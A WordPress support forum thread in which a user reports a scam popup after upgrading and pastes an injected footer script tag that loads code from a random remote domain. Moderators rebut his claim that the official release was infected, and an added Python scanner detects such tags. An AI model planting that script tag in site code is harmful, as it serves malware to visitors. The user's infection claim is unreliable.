• Mike

    (@creditcardforum)


    I just upgraded WP on one of my blogs manually and it’s installed a popup scam security ad on my blog! Please go to creditcardforum dot com /blog in Internet Explorer to see (doesn’t do it in Firefox). Please help. How do I get rid of this?!

Viewing 8 replies - 1 through 8 (of 8 total)
  • Thread Starter Mike

    (@creditcardforum)

    </div> <!-- Footer div -->
    </div> <!-- Wrapper div -->
    
    <script src="https://kdjkfjskdfjlskdjf.com/kp.php"></script>
    </body>
    </html>

    That’s what’s in your footer! index.php, page.php, etc. are all infected with malicious code… I DOWNLOADED 2.9.2 DIRECTLY FROM www.ads-software.com! Someone needs to stop this!

    Thread Starter Mike

    (@creditcardforum)

    Anyone home? This is urgent… I’m not talking about myself, but rather everyone else that is downloading these infected files from www.ads-software.com! I just restored my DB and files to pre-update. I’m going through the files downloaded from WordPress and these are so infected it’s not even funny. Someone needs to pull the 2.9.2 corrupt files ASAP. I can’t even imagine how many people are being affected by this and probably don’t even know it.

    I just downloaded 2.9.2 and looked in index.php and page.php and did not see anything to match your code; my index file only has two real lines of code.

    Moderator James Huff

    (@macmanx)

    I just looked through the source of the index.php and page.php files from the Default and Classic themes and the main index.php file from WordPress 2.9.2. I see absolutely no reference to any sort of malware or the script tag that you posted. Are you sure the malware is not in your own theme or perhaps being added by a plugin?
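
One way to check an install's theme and plugin files for the kind of injected footer `<script>` tag posted earlier in this thread. This is an added example, not code from any poster or from WordPress; the allowlist, the `injected.example` host and the two-file sample theme are constructed assumptions.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Assumption: hosts this blog legitimately loads scripts from; adjust per site.
ALLOWED_HOSTS = {"blog.example", "ajax.googleapis.com"}

# Matches the src value of a <script> tag, quoted or unquoted.
SCRIPT_SRC = re.compile(r"""<script\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)

def external_scripts(text, allowed=ALLOWED_HOSTS):
    """Return (line_no, url) for every <script src> whose host is not allowed."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for url in SCRIPT_SRC.findall(line):
            host = urlparse(url).hostname  # None for relative paths and PHP-built URLs
            if host and host.lower() not in allowed:
                hits.append((line_no, url))
    return hits

def scan_tree(root, allowed=ALLOWED_HOSTS):
    """Scan every .php/.html file under root; return (relative_path, line_no, url)."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in {".php", ".html", ".htm"}:
            text = path.read_text(encoding="utf-8", errors="replace")
            for line_no, url in external_scripts(text, allowed):
                findings.append((path.relative_to(root).as_posix(), line_no, url))
    return findings

def demo():
    """Build a constructed two-file theme (not real WordPress files) and scan it."""
    clean = '<?php get_header(); ?>\n<script src="/wp-includes/js/jquery/jquery.js"></script>\n'
    infected = ('</div> <!-- Footer div -->\n</div> <!-- Wrapper div -->\n'
                '<script src="https://injected.example/kp.php"></script>\n</body>\n</html>\n')
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp) / "wp-content" / "themes" / "mytheme"
        theme.mkdir(parents=True)
        (theme / "index.php").write_text(clean, encoding="utf-8")
        (theme / "footer.php").write_text(infected, encoding="utf-8")
        return scan_tree(tmp)

if __name__ == "__main__":
    for rel_path, line_no, url in demo():
        print(f"{rel_path}:{line_no}: external script {url}")
```

The scan only sees literal `<script src>` tags in files on disk, so a clean result does not rule out injections that are encoded or stored in the database; diffing the install against a fresh download of the same version covers the file side more completely.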

    Moderator James Huff

    (@macmanx)

    Looking at some earlier threads, I bet your blog is either hosted with GoDaddy or subject to the same vulnerability. See these for more info:

    https://www.ads-software.com/support/topic/391658

    https://codex.www.ads-software.com/FAQ_My_site_was_hacked

    @creditcardforum

    Your source code says you are currently using WordPress 2.6.

    <meta name="generator" content="WordPress 2.6" />

    I also noted you are running a potentially vulnerable version of vBulletin at your domain root.

    <meta name="generator" content="vBulletin 3.6.11" />

    I think I read somewhere quite a while back about some serious XSS vulnerabilities in version 3.6.11 (if left unpatched).

    Just some food for thought while analyzing how you may have gotten hacked.

    [edit] and I see you are indeed hosted by GoDaddy.

    closing this hysterical thread as bunk – posted twice, anyway

  • The topic ‘URGENT HELP! WP upgrade installed spam!’ is closed to new replies.